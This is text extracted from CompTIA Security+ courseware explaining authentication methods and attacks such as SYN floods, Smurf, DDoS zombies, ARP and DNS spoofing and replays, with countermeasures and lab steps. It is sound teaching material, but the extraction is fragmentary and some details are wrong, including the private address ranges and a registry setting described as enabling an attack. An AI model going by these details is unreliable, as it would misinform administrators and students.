2 CHAP protects against ___________ attacks by changing the content of the challenge message with each authentication request.
playback
216
Authentication
217
Popular and usually more reputable CAs, such as VeriSign, have several levels of authentication that they issue, based on the amount of data they collect from their applicants. An applicant must usually show up in person to show the companies the required documentation to be granted the highest level. Less proof is required to receive lower levels of authentication. This means that if a CA wants to succeed in the marketplace they must be very careful when granting higher levels of authentication. It also means that people need to check the digital certificates they receive from other people and organizations to make sure that a reputable CA issued them. Digital certificates are proving themselves very useful on the Internet because they provide a safe and secure means of digital authentication.
218
Do it!
D-1:
2 A trusted, third-party entity that verifies the actual identity of an organization or individual before it provides a digital certificate is called a: A B
C
3 Symmetric ciphers use the same key to both encrypt and decrypt a message. True or false?
True
4 Digital certificate consists of which of the following? (Choose all that apply.)
A
The certificate owners public key The certificate owners signature The certification authoritys signature The expiration date of the public key
B
C D
Authentication
219
Introduce the concept of something you have versus something you know as it applies to authentication. A security token is like having an ATM card that allows you to begin transactions at automatic teller machines. You must also know the PIN in order to complete the transaction.
Passive tokens
Passive tokens simply act as storage devices for base keys. They share their keys by various means: notches on the token match a receiving device, magnetic strips transmit the key by using a card reader; optical bar codes are read by a scanner, and so on. The most common passive tokens are plastic cards with magnetic strips embedded in them. ATM cards, credit cards, card keys that open electronic door locks, and other types of these keys are everywhere today. They are cheap to manufacture and read, and are easy to carry, but unfortunately, they are also more easily copied than other types of tokens. This is why many of these types of tokens require that a PIN be produced along with the card. These PINs, like passwords typed into a computer, can be easily gained by someone glancing over your shoulder.
Active tokens
Unlike a passive token, an active token does not emit or otherwise share its base token. Instead, it actively creates another form of the base keysuch as a one-time password or an encrypted form of the base keythat is not subject to attack each time the owner tries to authenticate.
220
CompTIA Security+ Certification Originally these types of tokens required the user to read a value and type it into the computer using their keyboard. Increasingly common are tokens that plug directly into the computer. Some examples of this are smart cards, PCMCIA cards, USB tokens, and others that require a proprietary reader. In particular, smart cards offer many advantages and are gaining in popularity. A smart card is a plastic card, about the same size as a credit card, which has an embedded chip with an integrated circuit that provides either memory or memory along with a programmable microprocessor. Smart cards come in different formscontact, contactless, or hybridwhich can either be plugged into a device, or not, to work. Depending on the amount of memory and the type of microprocessor they have, smart cards can perform a multitude of functions. They can act as an employee badge, a credit card, an electronic building key, or some other access-granting certificate. They can also securely store personal information, such as biometric information, multiple username/password combinations, and individual health records, digital certificates, and private/public key infrastructure (PKI) keys.
One-time passwords
A one-time password is a password that is used only once for a very limited period of time and then is no longer valid. If it is intercepted at any point though, it becomes useless almost immediately. One-time passwords are typically generated using one of two strategies: by employing counter-based or clock-based tokens. A counter-based token is an active token that produces one-time passwords by combining the secret password with a counter that is synchronized with a counter in a server. Normally, you obtain the fresh password by pressing a button on the front of the token. A clock-based token is an active token that produces one-time passwords by combining a secret password with an internal clock. Both of these methods employ means to resynchronize the tokens counter or clock if they vary too much from the corresponding servers counter or clock. Although one-time password technologies significantly reduce the risk of attacks relative to static password technologiesthey are still open to certain kinds of attack, such as phone line redirection attacks (which divert an authenticated connection to capture transmitted data), IP address theft, and man-in-the-middle attacks.
Authentication Do it!
221
E-1:
Discussing tokens
2 A passive token holds a microchip in order to perform a function or calculation on the base key information. True or false?
False: This describes an active token.
222
Topic F: Biometrics
This topic covers the following CompTIA Security+ exam objectives:
# 1.2 Objective Recognize and be able to differentiate and explain the following methods of authentication Multi-factor Biometrics 5.1 Understand the application of the following concepts of physical security Access Control Biometrics
Authentication
223
6 A computer then analyzes the biometric data and compares it to the data stored in the preexisting template. 7 If the data provided by the current biometric scan sufficiently matches the data stored in the preexisting template, then the person is allowed access to the restricted area. 8 Following the authenticate, authorize, and audit (AAA) model introduced at the beginning of this unit, a record of the authentication should be kept so that an access audit can be performed later.
224
Exhibit 2-4: Fingerprint scanner by DigitalPersona A fingerprint scanner can be deployed in a broad range of environments; it provides flexibility and increased system accuracy by allowing users to enroll multiple fingers in the template system. Its weaknesses include the fact that it might not work properly if the fingertip or the device sensor is dirty, and that it is associated with criminality. Hand geometry Hand geometry authentication involves the measurement and analysis of different hand measurements. This biometric is relatively easy to use; moreover, simple integration into other systems and processes combined with an ability to scan people quickly and easily, makes this a popular choice for many companies. Relative to other biometrics, it has limited accuracy due to the relatively common measurements of peoples hands. Furthermore, a hand-scanning device (shown in Exhibit 2-5) is rather large and is unsuitable for cramped locations.
Authentication
225
Exhibit 2-5: Hand geometry scanner: HandkeyII by Recognition Systems Inc. Retinal scanning Retinal scanning involves analyzing the layer of blood vessels located at the back of the eye. This method is highly accurate, is very difficult to spoof, and measures a stable physiological trait. Its difficult to use because it requires the user to focus on a specific point in a receptacle (shown in Exhibit 2-6), and like a hand scanner, it is a relatively large device that would not work well in many situations. This is very expensive technology and might be appropriate only in very high-security areas.
226
CompTIA Security+ Certification Iris scanning Iris scanning involves analyzing the patterns of the colored part of the eye surrounding the pupil. It uses a relatively normal camera (shown in Exhibit 2-7) and does not require close contact between the eye and the scanner. Glasses can be worn during an iris scan, unlike a retinal scan. Template matching rates for this technology are very high; however, ease of use is still not very high compared to other methods.
Exhibit 2-7: Iris scanner by Panasonic Authenticam Facial scanning Facial scanning biometrics involves analyzing facial characteristics. It is a unique biometric in that it does not require the cooperation of the scanned individual: it can utilize almost any high-resolution image acquisition device such as a still or motion camera. Although this discussion is primarily concerned with the use of facial scanning to authenticate people trying to gain access to electronic resources, some government agencies are increasingly interested in using publicly placed cameras and driver license photos to help identify and track criminals and terrorists. Weaknesses in this system include the fact that scanning capabilities can be reduced in low light, facial features can change over time, and there are some concerns about the use of this technology on unsuspecting people who do not know they are being scanned. Behavioral characteristics Behavioral characteristics are those that are exhibited by an individual, such as the way a person signs her name or speaks a predetermined phrase, rather than characteristics that are actually a part of the physical makeup of that person, such as a fingerprint or the patterns of the iris or retina. Handwritten signature verification analyzes the way people sign their name, such as speed and pressure, as well as the final static shape of the signature itself. Signature scanning (Exhibit 2-8) is relatively accurate and, of course, people are already familiar with it as a form of authentication, which means they might not feel as invaded using this technology as they might with a fingerprint scan. A major weakness in this method is not with the technology, but with the user. Most people do not sign their name in a consistent manner, which can cause a high error rate when using this system to authenticate. Ironically, the presence of a physical signature is often the rationale for not adding more robust authentication methods.
Authentication
227
Exhibit 2-8: Signature scanner by Interlink ePad VP9105 Voice authentication relies on voice-to-print technologies, not voice recognition. In this process, your voice is transformed into text and compared to an original template. Although this is fairly easy technology to implement because many computers already have built-in microphones, the enrollment procedure is more complicated than other biometrics, and background noise can interfere with the scanning, which can be frustrating to the user.
228
Multi-factor authentication
There are three commonly recognized factors of authentication: Something you know, such as a password Something you have, such as a smart card Who you are (something about you), such as a biometric Multi-factor authentication requires that an individual be positively identified using at least one means of authentication from at least two of these three factors. When choosing which methods and how many factors to use to authenticate a person, its important to consider several implications of your choice. Each method of authentication has certain strengths and weaknesses and each, appropriately, requires people to exert a varying degree of time and effort to prove they are who they say they are. Adding additional factors of authenticity to your identification process decreases the likelihood that an unauthorized person can compromise your electronic security system, but it also increases the cost of maintaining that system. When deciding the degree of assurance you need about a persons identity, it is important to take into account both the cost of having an unauthorized person compromise your electronic security and the cost of having authorized people authenticate themselves before having access to the data and services they need on your network. As the cost of compromising your electronic security increases, so should your willingness to pay for that security, whether through the purchase and upkeep of hardware and software or through the expense of lost worker productivity.
Authentication Do it!
229
F-1:
Fingerprints Hand geometry Retinal and iris patterns Facial characteristics Handwritten signature
An authorized person is not authenticated An unauthorized person is wrongly authenticated An authorized person is authenticated but denied access to needed areas
B
C
B C
D
230
Topic B
Topic C
Topic D
Topic E Topic F
Review questions
1 Which of the following best describes authentication? A The process of gaining access to resources B The process of utilizing resources
C
D The process of assigning permissions to users 2 What is the advantage in removing the name of the last user to log on? A Allows users to share computers B Requires users to remember their usernames
C
Authentication 3 Why is password length important? A Longer passwords are impossible to hack
B
231
C Windows requires long passwords in a domain environment D Longer passwords can prevent password cracking programs from working properly 4 What is the password length recommended by most security professionals? A Six or more characters B Five or more characters C Eight or more characters
D
B The complexity of passwords adds to the security of long passwords C Complex passwords are impossible to crack
D
6 Which of the following is considered a complex password? (Choose all that apply.)
A B
@1c4htj3 Pa$$w0rd
C ncdjszkjdnc
D
Ajd649sg
7 CHAP stands for Challenge Handshake Authorization Protocol (CHAP). True or false?
False: CHAP stands for Challenge Handshake Authentication Protocol.
8 Which of the following is not a part of the CHAP authentication process? A The authenticating server compares the value it receives from the peer with the hash value it expects by calculating its own expected hash value.
B
C The peer creates a variable-length value using a one-way hash function on a fixed-length input message. D The authenticating server issues new challenge messages to the peer at random intervals throughout the communication session. E The CHAP authentication process starts after the authenticating server tells the peer that CHAP will be used.
232
CompTIA Security+ Certification 9 There are many different password conventions; what are basic rules to follow in order to safeguard your passwords. (Choose all that apply.)
A B C D E
Passwords must be memorized. If they must be written down, the written records must be locked up. Each password you choose must be different from any other that you use. Passwords must be at least six characters long, and probably longer, depending on the size of the character set used. Passwords must contain a mixture of letters (both uppercase and lowercase), numbers, and other characters, such as %, !, or &. Passwords must be changed periodically.
10 Kerberos assumes that none of the workstations or servers is physically secure and that bad guys can position themselves between the user and the service being sought. True or false?
False: Kerberos assumes that workstations, servers, and other devices that are connected to the network are physically secure, and that there is no way for an attacker to gain access to a password by establishing a position between the user and the service being sought.
11 In a Kerberos system, after a client has received a ticket from an authentication server, it creates and adds an authentication that contains the users username and time stamp. True or false?
True
12 The authenticator in a CHAP session must return either a success or failure message to the sender once it has compared the expected hash value to the actual hash value. True or false?
True
14 An active token is a device that creates and shares modified or encrypted forms of the base key. True or false?
True
C Dictionary attacks
D
Man-in-the-middle attacks
Authentication 16 Which of the following is an example of a biometric? (Choose all that apply.) A Complex passwords
B C
233
D Smart cards 17 A biometric that involves the measurement and analysis of different hand characteristics and measurements is called: A Fingerprints B Facial recognition
C
Hand geometry
D All of the above 18 A biometric that involves analyzing voice characters and measurements is called: A Voice-to-print technology B Facial recognition C Sound technology
D
Voice authentication
234
CompTIA Security+ Certification 7 Which of the following is a disadvantage of the RunAs command? (Choose all that apply.) A Opens potential security holes
B C
Allows users to install applications if they know the local administrator password Allows users to access administrative tools if they know the local administrator password
D Allows users to change account permissions 8 How can you use RunAs on an existing shortcut? A Hold down the Alt key and right-click the shortcut B Right-click the shortcut
C
D Hold down the Ctrl key and right-click the shortcut 9 What application should you not use RunAs to execute? A A virus scanner B An e-mail application
C
A word processor
D An auditing program 10 How can you prevent users from using RunAs? A Delete the RunAs command
B
31
service (DoS) attacks, including SYN flood, Smurf, Ping of Death, and Distributed Denial of Service (DDoS) attacks.
B Identify man-in-the-middle attacks. C Recognize the major types of spoofing
attacks, including IP address spoofing, ARP poisoning, Web spoofing, and DNS spoofing.
D Discuss replay attacks. E Explain TCP session hijacking. F Detail various types of social-engineering
encrypted data.
H List the major types of attacks used against
encrypted data.
32
1.4
33
SYN flood
A SYN flood attack prevents users from accessing a target server by flooding it with half-open TCP connections. Normal TCP connections between two hosts are arranged with an exchange of three packets. 1 The first packet is sent from the client to the server with the SYN flag set. 2 The server acknowledges the session by replying with a packet that has both the SYN and the ACK flags set (a SYN/ACK packet). 3 The client responds to the server with an ACK packet. The TCP session is completely established and the two hosts are able to exchange data. If, for some reason, the client doesnt complete the connection by sending the ACK packet, the server waits a couple of minutes, giving the client plenty of time to respond, before clearing the uncompleted connection from memory and making it available for use by others. The TCP session setup process is shown in Exhibit 3-1.
If students question what the abbreviations in the Exhibit mean: SEQ is the packet sequence number, CTL is the control flag, SYN is the synchronize control flag, and ACK is acknowledgement. More information about threeway handshakes can be found in RFC 793.
Exhibit 3-1: TCP three-way handshake Although most computer systems can handle many established network connections, they usually can handle only a handful of connections that are in the process of being established (or half-open connections). This is because connections are usually set up in such a short amount of time that there is no need for a long queue for half-open connections. Conducting SYN flood attacks An attacker can render a machine unavailable to network users by filling the half-open connections queuewithout permitting the connections to be completed and moved into the list of fully open connections. This is accomplished by flooding the server with SYN packets that have a spoofed source address. The server responds with an SYN/ACK packet to the fake source address, but never receives the ACK reply, which is needed to complete the TCP connection. The server cannot accept any more TCP connections until the half-open connections time-out, so legitimate users can be prevented from reaching the server.
34
CompTIA Security+ Certification Countermeasures Many commercial firewall products have features to reduce the effect of SYN floods. The firewall sits between the attacking client machine and the attacked server, so it has the ability to withhold or insert packets into the data stream as necessary to thwart SYN floods. One strategy used by firewalls is to immediately respond to the servers SYN/ACK packet with an ACK that uses the spoofed IP address of the client, as shown in Exhibit 3-2. This permits the server to move the session out of the half-open connections queue. If the connection is a legitimate one, the client shortly responds with its own ACK packet, which the firewall can forward to the server with no negative impact. If the connection is not legitimate, then no ACK is forthcoming from the client. In this case, the firewall can safely kill the TCP session by sending the server an RST (reset) packet. This is just one example of how firewalls can mitigate the effect of SYN floods; every firewall manufacturer has its own strategy. Other countermeasures include: Increase the size of the servers half-open connection queue. Decrease the queues time-out period, limiting the number of half-open connections from a single IP. Use network-based intrusion detection systems that can detect SYN floods and notify administrators.
Exhibit 3-2: Defending against the SYN flood SynAttackProtect You can protect your server from SYN floods with the TCP/IP parameter SynAttackProtect. This parameter is used to enable SYN flooding attack. A value of 1 enables this if the TcpMaxConnectResponseRetransmissions value is at least 2. This protection detects SYN flooding and then reduces the time spent on server connection requests that can't be acknowledged. This entry can be added to Windows Server 2003 through Regedit.
35
A-1:
Heres how
1 Log on to the Windows Server 2003 server as Administrator
7 Expand Services 8 Expand Tcpip 9 Select Parameters 10 Right-click Parameters 11 Choose New, DWORD Value
Enter SynAttackProtect
36
CompTIA Security+ Certification 12 Right-click SynAttackProtect Choose Modify 13 In the Value Data field, enter 1 Click OK 14 Close the Registry Editor window
A value of 1 enables the parameter. To start the process of changing the parameter value.
37
Smurf
Explanation Smurf is a non-OS specific attack that uses a third-partys network segment to overwhelm a host with a flood of Internet Control Message Protocol (ICMP) packets. As shown in Exhibit 3-3, three parties are involved: the attacker, an intermediary network (preferably, with numerous hosts), and the victim (typically, a computer or router on the Internet). 1 The hacker sends a ping (echo-request) packet to the intermediary networks broadcast address. The packets source IP address is faked to be that of the victim system. 2 The ping was sent to the broadcast address of the intermediary network, so every host on that subnet replies to the victims IP address. 3 The third-partys hosts unwittingly deluge the victim with ping packets. Using this technique, the hacker cannot only overwhelm the computer system receiving the flood of echo packets, but can also saturate the victims Internet connection with bogus traffic and therefore delay or prevent legitimate traffic from reaching its destination.
Exhibit 3-3: Smurf attack Countermeasures Protective measures against Smurf attacks can be placed in the network or on individual hosts. Configure routers to drop ICMP messages from outside the network with a destination of an internal broadcast or multicast address. Configure hosts to ignore echo requests directed to their subnet broadcast address. Most current router and desktop operating systems have protection in place to guard against well-known Smurf attacks by default, but changes to the configuration or new modifications of the attack might make the network and hosts vulnerable.
38
Ping of Death
There are a number of attacks that exploit some operating systems incorrect handling or error checking of fragmented IP packets. The Ping of Death is a well-known exploit that uses IP packet fragmentation techniques to crash remote systems. When first released, this shockingly simple attack had the ability to crash any machine that could receive a ping packet. All the attackers needed to use in this attack was the victims IP address! Mode of attack
Explain the nature of IP packets and the concept of the MTU. You can explain an MTU by using a floppy disk analogy. If you want to transfer 5MB of information from one computer to the other using a floppy disk, you will have to split the information up into chunks small enough for the floppy to handle and then reassemble the data on the other computer.
This common exploit misuses the way that large IP packets (or more specifically, ICMP packets, because the attack uses a ping) are transmitted across networks. The maximum size of an IP packet is 65,535 bytes, but packets that are large cannot be transmitted on many network topologies. For example, the maximum transmission unit (MTU) for Ethernetprobably the most commonly used LAN topologyis only 1500 bytes. To transmit a large IP packet across a LAN, hosts and routers fragment IP packets into smaller Ethernet frames, and then reassemble the fragments at the destination. Each fragment contains an offset value that tells the receiving host where to insert its data into the reassembled packet. In the Ping of Death, a very large ICMP (ping) packet is crafted and transmitted to the victim, fragment by fragment. With each fragment, the size of the reassembled ping grows to near the 65,535-byte size limit of the IP packet. When the final fragment arrives, its offset value forces the packet to grow beyond the IP size limit, causing the victim host to crash. Countermeasures What made this attack particularly problematic was that recent Windows operating systems allowed the generation of nonstandard pings from the regular user command line, but the same systems would die when presented with one of these packets. Most manufacturers have now provided patches that make their systems invulnerable to the Ping of Death and other types of IP fragmentation attacks. Starting with Windows 2000, Microsoft has removed the ability to generate ICMP packets of invalid size by setting the maximum packet size to 53,000 bytes.
39
A-2:
Flooding a host with ICMP messages Transmitting excessively large IP packets Filling the half-open connection queue with bogus connections Overwhelming a DNS server with lookup requests
310
Exhibit 3-4: Distributed denial-of-service attack This is typically a large machine with plenty of disk space and a fast Internet connection, so the malicious hacker has the resources necessary to upload an exploit toolkit. Its important that the hacker go undetected on the handler machine, so hosts with a large number of user accounts or inattentive system administrators are targets for use as handlers. Once the handler has been setup with the necessary software tools, it begins to use automated scripts to scan large chunks of ISP address space (DSL and cable customers making the best targets because of their bandwidth and constant connection) to find hosts to use as agents, or zombies. The scripts used for this purpose generally target specific, known vulnerabilities in Windows operating systems and can complete the task of compromising each system and uploading the zombie software within a matter of seconds. The software is transparent to the machines owner, as it is imperative to the attacker that their tools go undetected.
311
Hundreds or thousands of zombies might be required to launch a successful DDoS attack, because most major Web sites have sufficient bandwidth and server resources to handle substantial amounts of network traffic. This is not an obstacle for the determined script kiddie, as the ever increasing number of unprotected home PCs connected to the Internet provides ample fodder for creating a large army of zombies. Conducting DDoS attacks The agent software on compromised hosts usually communicates with the handler machine via Internet Relay Chat (IRC) connections. These hosts are automatically logged on to an IRC channel where they passively wait for attack orders from the handler machines. When the malicious hacker is ready to launch the attack, a command is issued through the handler machine to the thousands of agents connected to the channel. Depending on the type of agent software installed, the attacker has a number of attack types to choose from, as listed in the following table:
Tools If students are unfamiliar with UDP explain that it is a connectionless protocol often used for network broadcast messages. Trin00 Tribe flood network Stacheldracht and variants TFN 2K Shaft More information about Trinity can be found at www.ciac.org/ciac/ bulletins/k-072.shtml Mstream Trinity, Trinity v3 Flooding or attack methods UDP UDP, ICMP, SYN Smurf UDP, ICMP, SYN Smurf UDP, ICMP, SYN Smurf UDP, ICMP, SYN combo Stream (ACK) UDP, SYN, RST, Random Flag, ACK, Fragment
When the attacker is ready to launch the attack, the zombies are remotely instructed to flood the victim networkwhich they do without the machines owners ever being aware that their computer has been compromised. For an account of a DDoS attack, and the hackers methods and objectives, see Steve Gibsons account at http://grc.com/dos/grcdos.htm.
312
CompTIA Security+ Certification DDoS countermeasures The following table outlines actions you can take to safeguard your network against DDoS attacks.
Equipment Clients and servers Action Install the latest security patches from your software vendors. Install and configure personal firewalls on desktop PCs. Install antivirus software and maintain up-to-date signatures. Perform regular hard disk scans with the antivirus software. E-mail servers Install antivirus software on all mail servers, both internal and external, to protect the network from e-mail worms. Filter packets coming into the network destined for a broadcast address. This can help to prevent your network from being susceptible to the Smurf attack. Turn off directed broadcasts on all internal routers. This also internally prevents a Smurf attack. Block any packet from entering your network that has a source address that is not permissible on the Internet. This type of address would include RFC 1918 address space (10.0.0.0, 172.16.24.0, and 192.68.0.0), multicast address space (224.0.0.0), and loopback addresses (127.0.0.0). Block any packet that uses a protocol or port that is not used for Internet communications in your network. Block packets with a source address originating inside your network from entering your network. Block packets with fake source addresses from leaving your network.
Inform students that a detailed discussion of firewalls will be offered later in the course.
313
A-3:
Heres how
See the classroom setup instructions for the location of the download file.
5 Under Target IP address range, enter the range specified by your Instructor
This type of scan is often detected by a network administrator and might violate computer use policies if done without permission.
6 Click Start
The scan will take a few seconds to complete. Wait until the Program stopped message appears. To determine whether the system is infected. If no names appear in the Infected Hosts section and in the Status section, Zombies detected is 0, your system is clean.
314
Do it!
A-4:
2 List three countermeasures you can implement to protect clients and servers from DDoS attacks.
Answers might include:
Install the latest security patches Install and configure personal firewalls on desktop PCs Install antivirus software and maintain up-to-date signatures Perform regular hard disk scans with the antivirus software
3 Number the steps to launch a DDoS attack in the proper sequence. ___ Zombies log onto IRC channel to communicate with the handler ___ Zombies flood the victim network ___ Attacker compromises machine to be used as a handler ___ Handler uploads the zombie software ___ Handler scans for hosts to use as agents or zombies ___ Handler launches attack
3 5 4 1 6 2
315
1.4
316
CompTIA Security+ Certification Man-in-the-middle attacks have a variety of applications, including: Web spoofing This is an attack in which the assailant arranges his Web server between his victims Web browser and a legitimate server. In this case, the attacker can monitor and record the victims online activity, as well as modify the content being viewed by the victim. TCP session hijacking By arranging for traffic between two hosts to pass though his machine, an attacker can actually take over the role of one of them and assume full control of the TCP session. For example, by monitoring a victims communications with an FTP server, the attacker can wait for the victim to authenticate and then hijack the TCP session and take over the users access to the FTP server. Information theft The attacker can passively record data communications in order to gather sensitive information that might be passing between two hosts. This information could include anything from industrial secrets to username and password information. Many other attacks, including denial-of-service attacks, corruption of transmitted data, or traffic analysis to gain information about the victims network.
317
B-1:
2 TCP session hijacking is an attack in which the assailant arranges his Web server between his victims Web browser and a legitimate server. True or false?
False: Web spoofing does this
Monitor and record a victims online activity Modify information presented to a user Hijack a session Gather confidential information
318
Topic C: Spoofing
This topic covers the following CompTIA Security+ exam objectives:
# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Spoofing
1.4
Spoofing types
Explanation Spoofing is pretending to be someone else by imitating or impersonating that person. When you present credentials (for example, a username/password, hostname, or IP address) that are not yours in order to gain access to a network, then you are spoofing that system. This is much like presenting a fake drivers license to illegally buy alcohol or presenting fake credentials to appear as a law enforcement official. Four primary types of spoofing are issues for the information security professional: IP address spoofing ARP poisoning Web spoofing DNS spoofing
IP address spoofing
IP address spoofing gains access to a victim by generating TCP/IP packets with the source address of a trusted host. The attacker uses this deception to bypass filters on routers and firewalls and gain access to network resources. The sequence of events for an attack that uses IP spoofing is described below and pictured in Exhibit 3-6. 1 The attacker identifies a target, the victim of the attack, and a machine that is trusted by the victim. The attacker disables the trusted machines ability to communicate by flooding it with SYN packets. 2 The attacker uses some mechanism to determine the sequence numbers to be used by the victim. This could involve sampling packets between the victim and trusted hosts. The attacker spoofs the source IP address of the trusted host in order to send his or her own packets to the victim. 3 The victim accepts the spoofed packet and responds. Although the network infrastructure automatically routes the victims reply packets to the trusted host, the trusted host is unable to process the packets because of the SYN flood attack against it. 4 Blind to the victims response, the attacker must guess its contents and craft an appropriate response, again using a spoofed source address and a guessed sequence number.
319
Exhibit 3-6: Filtering spoofed packets Challenges There are three primary challenges faced by the attacker using IP address spoofing. 1 Although the hacker can craft packets that can be routed via the Internet, past the firewall, to the victim, the perpetrator cannot cause the return packet to be delivered back to his or her machine. This is because the network automatically routes the reply packet to the trusted host. In such a case, the hacker is flying blind and cannot hear the victim hosts responses. 2 The victims reply packets are automatically delivered to the trusted host by the network infrastructure. If the trusted host the hacker is spoofing responds to the packets that it is receiving from the victim, it could interfere with the scheme. To prevent this from happening, the hacker needs to DoS the trusted host to keep it from responding to the victims packets. This can be accomplished with an SYN flood. 3 This hurdle is perhaps the most difficult to leap: in order for the victim host to accept the spoofed packets from the hacker, the packets must have the correct sequence number. The initial sequence number (ISN) is provided by the victim host as part of a session setup. Remember that the hacker cannot receive any packets back from the victim during the spoofed session. The hackers ability to craft packets with the correct sequence numbers (which are therefore accepted by the victim) is reliant upon the hackers ability to narrow the ISN down to an acceptable range, and to predict subsequent sequence numbers based on knowledge of the ISN and the victims algorithm for determining subsequent sequence numbers.
320
CompTIA Security+ Certification Countermeasures To prevent IP spoofing, disable source routing on all internal routers. Also, filter out packets entering the local network from the Internet that have a source address of the local network.
Do it!
C-1:
Heres how
See the classroom setup instructions for location of the download file.
5 Click the right arrow key next to the IP address range 6 Click the blue Start arrow 7 Review the results 8 Based on the results of the scan, which IP Addresses are in use?
To add the address range as the range to be scanned. To start the scan.
Answers will vary. Notice that the IP address of the host performing the scan is not included in the list. This is because no ports are open on the host performing the scan and by default; hosts without open ports aren't listed. This type of information is very useful to hackers.
9 Which ports are open on those systems? 10 When you are done viewing the scan results, close the application window
321
ARP poisoning
Explanation ARP (Address Resolution Protocol) poisoning is a technique used to corrupt a hosts ARP table, allowing the hacker to redirect traffic to the attacking machine. The attack can only be carried out when the attacker is connected to the same local network as the target machines. Operation ARP operates by sending out ARP request packets. An ARP request broadcasts the question, Whose IP address is x.x.x.x? to all computers on the LAN, even on a switched network. Each computer examines the ARP request and checks if it is currently assigned the specified IP. The machine with the specified IP address returns an ARP reply containing its MAC address. To minimize the number of ARP packets being broadcast, operating systems keep a cache of ARP replies. When a computer receives an ARP reply, it will update its ARP cache with the new IP/MAC association. ARP cache poisoning occurs when an attacker sends forged ARP replies. In this case, a target computer could be convinced to send frames to the attackers PC instead of the trusted host. When done properly, the trusted host will have no idea this redirection took place. Attack tools used for ARP poisoning include ARPoison, Ettercap, and Parasite. These tools are able to spoof ARP packets to perform man-in-the-middle attacks, redirect transmission, or to simply intercept packets. Countermeasures To stop ARP poisoning, use network switches that have MAC binding features. Switches with MAC binding store the first MAC address that appears on a port and do not allow the mapping to be changed without authentication.
Web spoofing
A Web spoofing attack convinces its victims that they are visiting a real and legitimate site, when they are in fact visiting a Web page that has either been created or modified by the attacker for duping the victim. The attacker can then monitor or modify any data passing between the victim and the Web server. Web spoofing attacks come in two flavors: Man-in-the-middle attacks Denial of Service attacks Man-in-the-middle attacks In this form of Web spoofing, the attacker rewrites the URLs embedded in the Web pages to point to the attackers Web server rather than a legitimate server. This is accomplished using automated URL editing tools. Assuming the attackers server is on machine www.attacker.net, the attacker rewrites each URL to begin with http://www.attacker.net/. The link http://newspaper.com becomes http://www/attacker.net/http://newspaper.com.
322
CompTIA Security+ Certification When the victim clicks on the revised URLs, the browser requests a page from the attackers server, which then requests the page from the real server. The attackers server revises the pages URLs before providing the edited version to the victim. Using this method, every page on the World Wide Web can be altered to pass through the attackers server, as shown in Exhibit 3-7.
Exhibit 3-7: Web spoofing Denial of Service attacks Another form of Web spoofing displays a false, but convincing Web page to the victim with the objective of obtaining confidential information or providing false information. The Web page mimics a legitimate Web page, but the content is altered to redirect communications from the intended site to the attackers server. To see some examples of Web spoofing, visit the following page:
http://www.cs.dartmouth.edu/~pkilab/demos/spoofing/
Countermeasures To defend against Web spoofing attacks, do the following: Disable JavaScript, ActiveX, and Java in the browser. The attacker will be unable to hide the evidence of the attack. Display the browsers location line. Instruct users to watch their browsers location line for any dubious URLs. Instruct users to set their homepage to a known secure Web site.
DNS spoofing
DNS spoofing manipulates the DNS server to redirect users to an attackers server. The DNS server resolves Internet domain names (www.security.net) to IP addresses (192.168.1.20), taking the burden off the user to remember a series of numbers. DNS spoofing can alter the cache so that www.security.net, which normally translates to an IP address of 203.123.12.10, is redirected to 186.120.0.40.
Attacks and malicious code DNS spoofing is accomplished in one of three ways:
323
The attacker compromises the victim organizations Web server and changes a hostname-to-IP address mapping. When users request the hostname, they are directed to the hackers server, rather than the authentic one. Using IP spoofing techniques, the attackers DNS server instead of the legitimate DNS server answers lookup requests from users. Again, the hacker can direct user lookups to the server of his or her choice instead of to the authentic server (also called DNS hijacking). When the victim organizations DNS server requests lookups from authoritative servers, the attacker poisons the DNS servers cache of hostname-to-IP address mappings by sending false replies. The organizations DNS server stores the invalid hostname-to-IP address mapping and serves it to clients when they request a resolution. All three attacks can cause serious security problems, such as redirecting clients to wrong Internet sites or routing e-mail to non-authorized mail servers. Countermeasures To prevent DNS spoofing: Ensure that your DNS software is the latest version, with the most recent security patches installed. Enable auditing on all DNS servers. Secure the DNS cache against pollution. Deploy anti-IP address spoofing measures. Do it!
C-2:
Heres how
Tell students the default configuration of Microsoft DNS server allows data from malicious or incorrectly configured servers to be cached in the DNS server. This procedure sets filters in place to protect the cache from DNS spoofing.
1 Click Start Choose Administrative Tools, DNS 2 Right-click the server name Choose Properties 3 Activate the Advanced tab 4 Verify that Secure cache against pollution is checked 5 Click Cancel 6 Close the dnsmgmt window
To filter for bogus cache instructions from unauthorized servers. To open the dnsmgmt window.
324
Do it!
C-3:
B C D
2 IP address attacks spoof the __________________________ of the trusted host to send its packets to the victim.
source IP address
3 Web spoofing is considered a ___________ attack when the attacker places himself between the victim and the Web server that the victim wants to visit. A B
C
The attacker compromises the victims DNS server and changes a hostnameto-IP address mapping The attacker rewrites the URLs embedded in legitimate Web pages to include the attackers Web server The attackers DNS server instead of a legitimate DNS server answers lookup requests from users The attacker rewrites the content of a Web page to make the victim believe some false information
B
C
325
Topic D: Replays
This topic covers the following CompTIA Security+ exam objectives:
# 1.3 Objective Identify non-essential services and protocols and know what actions to take to reduce the risks of those services and protocols Recognize the following attacks and specify the appropriate actions to take to mitigate vulnerability and risk Replay
1.4
Replay attacks
Explanation Replay attacks involve listening to and repeating messages from a legitimate user in order to impersonate the user and gain access to systems. To implement a replay attack, the attacker: 1 Uses a sniffer program or device to read and capture packets passed between two hosts on the network. Sniffers work by placing the machines network interface into promiscuous mode, meaning that it listens to all packet activity on the network. 2 Filters the data and extracts the authentication transaction, typically an encrypted username and password, digital signature or encryption key. 3 Does not attempt to decrypt the transaction, but instead replays the transaction in order to gain access to a secured resource. Actually, replay attacks are more challenging than just recording and replaying information. To perform such an attack, the attacker must accurately guess the TCP sequence numbers. The attacker can accomplish this by using a script or utility that automatically makes guesses until the correct sequence is determined.
Web-based replays
A Web application is vulnerable to a replay attack if a users authentication tokens (nonencrypted session identifier in URL, unsecured cookie, and so on) are captured or intercepted by an attacker. By simply sniffing an HTTP request of an active session or capturing a desktop users cookie files, a replay attack can be very easily performed. For example, by sniffing a URL that contains the session ID string, an attacker might be able to obtain or create service to that users account simply by pasting this URL back into his Web browser. The legitimate user might not need to be logged on to the application at the time of the replay attack.
Other replays
Biometric devices are also vulnerable to replay attacks. In Might of 2002, a Japanese researcher presented a study showing that biometric fingerprint readers can be fooled 80 percent of the time by a fake finger created with gelatin using fingerprints lifted from a drinking glass.
326
